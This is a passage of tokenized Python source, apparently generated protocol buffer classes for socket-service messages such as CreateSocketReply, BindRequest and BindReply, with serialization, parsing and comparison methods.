putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . protocol_ ) <EOL> for i in xrange ( len ( self . socket_options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . socket_options_ [ i ] . ByteSize ( ) ) <EOL> self . socket_options_ [ i ] . OutputUnchecked ( out ) <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> self . proxy_external_ip_ . OutputUnchecked ( out ) <EOL> if ( self . has_listen_backlog_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . listen_backlog_ ) <EOL> if ( self . has_remote_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:50> ) <EOL> out . putVarInt32 ( self . remote_ip_ . ByteSize ( ) ) <EOL> self . remote_ip_ . OutputUnchecked ( out ) <EOL> if ( self . has_app_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . app_id_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_family_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . family_ ) <EOL> if ( self . has_protocol_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . protocol_ ) <EOL> for i in xrange ( len ( self . socket_options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . socket_options_ [ i ] . ByteSizePartial ( ) ) <EOL> self . socket_options_ [ i ] . OutputPartial ( out ) <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> self . proxy_external_ip_ . OutputPartial ( out ) <EOL> if ( self . has_listen_backlog_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . listen_backlog_ ) <EOL> if ( self . has_remote_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:50> ) <EOL> out . putVarInt32 ( self . remote_ip_ . ByteSizePartial ( ) ) <EOL> self . remote_ip_ . 
OutputPartial ( out ) <EOL> if ( self . has_app_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . app_id_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_family ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_protocol ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_socket_options ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_proxy_external_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_listen_backlog ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:50> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_remote_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_app_id ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_family_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . family_ ) ) <EOL> if self . has_protocol_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . protocol_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . 
socket_options_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_proxy_external_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . proxy_external_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_listen_backlog_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . listen_backlog_ ) ) <EOL> if self . has_remote_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . remote_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_app_id_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . app_id_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kfamily = <NUM_LIT:1> <EOL> kprotocol = <NUM_LIT:2> <EOL> ksocket_options = <NUM_LIT:3> <EOL> kproxy_external_ip = <NUM_LIT:4> <EOL> klisten_backlog = <NUM_LIT:5> <EOL> kremote_ip = <NUM_LIT:6> <EOL> kapp_id = <NUM_LIT:9> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> } , <NUM_LIT:9> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . 
STRING , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:6> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:9> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:9> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class CreateSocketReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_server_address_ = <NUM_LIT:0> <EOL> server_address_ = None <EOL> has_proxy_external_ip_ = <NUM_LIT:0> <EOL> proxy_external_ip_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def server_address ( self ) : <EOL> if self . server_address_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . server_address_ is None : self . server_address_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . server_address_ <EOL> def mutable_server_address ( self ) : self . has_server_address_ = <NUM_LIT:1> ; return self . server_address ( ) <EOL> def clear_server_address ( self ) : <EOL> if self . has_server_address_ : <EOL> self . has_server_address_ = <NUM_LIT:0> ; <EOL> if self . server_address_ is not None : self . server_address_ . Clear ( ) <EOL> def has_server_address ( self ) : return self . 
has_server_address_ <EOL> def proxy_external_ip ( self ) : <EOL> if self . proxy_external_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . proxy_external_ip_ is None : self . proxy_external_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . proxy_external_ip_ <EOL> def mutable_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:1> ; return self . proxy_external_ip ( ) <EOL> def clear_proxy_external_ip ( self ) : <EOL> if self . has_proxy_external_ip_ : <EOL> self . has_proxy_external_ip_ = <NUM_LIT:0> ; <EOL> if self . proxy_external_ip_ is not None : self . proxy_external_ip_ . Clear ( ) <EOL> def has_proxy_external_ip ( self ) : return self . has_proxy_external_ip_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_server_address ( ) ) : self . mutable_server_address ( ) . MergeFrom ( x . server_address ( ) ) <EOL> if ( x . has_proxy_external_ip ( ) ) : self . mutable_proxy_external_ip ( ) . MergeFrom ( x . proxy_external_ip ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_server_address_ != x . has_server_address_ : return <NUM_LIT:0> <EOL> if self . has_server_address_ and self . server_address_ != x . server_address_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ != x . has_proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ and self . proxy_external_ip_ != x . proxy_external_ip_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . 
has_server_address_ and not self . server_address_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ and not self . proxy_external_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_server_address_ ) : n += <NUM_LIT:1> + self . lengthString ( self . server_address_ . ByteSize ( ) ) <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_server_address_ ) : n += <NUM_LIT:1> + self . lengthString ( self . server_address_ . ByteSizePartial ( ) ) <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_server_address ( ) <EOL> self . clear_proxy_external_ip ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_server_address_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . server_address_ . ByteSize ( ) ) <EOL> self . server_address_ . OutputUnchecked ( out ) <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> self . proxy_external_ip_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . 
has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_server_address_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . server_address_ . ByteSizePartial ( ) ) <EOL> self . server_address_ . OutputPartial ( out ) <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> self . proxy_external_ip_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_server_address ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_proxy_external_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_server_address_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . server_address_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_proxy_external_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . proxy_external_ip_ . 
__str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> kserver_address = <NUM_LIT:3> <EOL> kproxy_external_ip = <NUM_LIT:4> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> } , <NUM_LIT:4> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:4> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class BindRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_proxy_external_ip_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . proxy_external_ip_ = AddressPort ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def proxy_external_ip ( self ) : return self . proxy_external_ip_ <EOL> def mutable_proxy_external_ip ( self ) : self . 
has_proxy_external_ip_ = <NUM_LIT:1> ; return self . proxy_external_ip_ <EOL> def clear_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:0> ; self . proxy_external_ip_ . Clear ( ) <EOL> def has_proxy_external_ip ( self ) : return self . has_proxy_external_ip_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_proxy_external_ip ( ) ) : self . mutable_proxy_external_ip ( ) . MergeFrom ( x . proxy_external_ip ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ != x . has_proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ and self . proxy_external_ip_ != x . proxy_external_ip_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_proxy_external_ip_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> elif not self . proxy_external_ip_ . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthString ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . 
lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_proxy_external_ip ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> self . proxy_external_ip_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> self . proxy_external_ip_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_proxy_external_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_proxy_external_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . proxy_external_ip_ . 
__str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> kproxy_external_ip = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class BindReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_proxy_external_ip_ = <NUM_LIT:0> <EOL> proxy_external_ip_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def proxy_external_ip ( self ) : <EOL> if self . proxy_external_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . proxy_external_ip_ is None : self . proxy_external_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . proxy_external_ip_ <EOL> def mutable_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:1> ; return self . proxy_external_ip ( ) <EOL> def clear_proxy_external_ip ( self ) : <EOL> if self . has_proxy_external_ip_ : <EOL> self . has_proxy_external_ip_ = <NUM_LIT:0> ; <EOL> if self . proxy_external_ip_ is not None : self . proxy_external_ip_ . Clear ( ) <EOL> def has_proxy_external_ip ( self ) : return self . 
has_proxy_external_ip_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_proxy_external_ip ( ) ) : self . mutable_proxy_external_ip ( ) . MergeFrom ( x . proxy_external_ip ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_proxy_external_ip_ != x . has_proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ and self . proxy_external_ip_ != x . proxy_external_ip_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_proxy_external_ip_ and not self . proxy_external_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_proxy_external_ip ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> self . proxy_external_ip_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> self . proxy_external_ip_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . 
pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_proxy_external_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_proxy_external_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . proxy_external_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kproxy_external_ip = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class GetSocketNameRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . 
has_socket_descriptor_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . 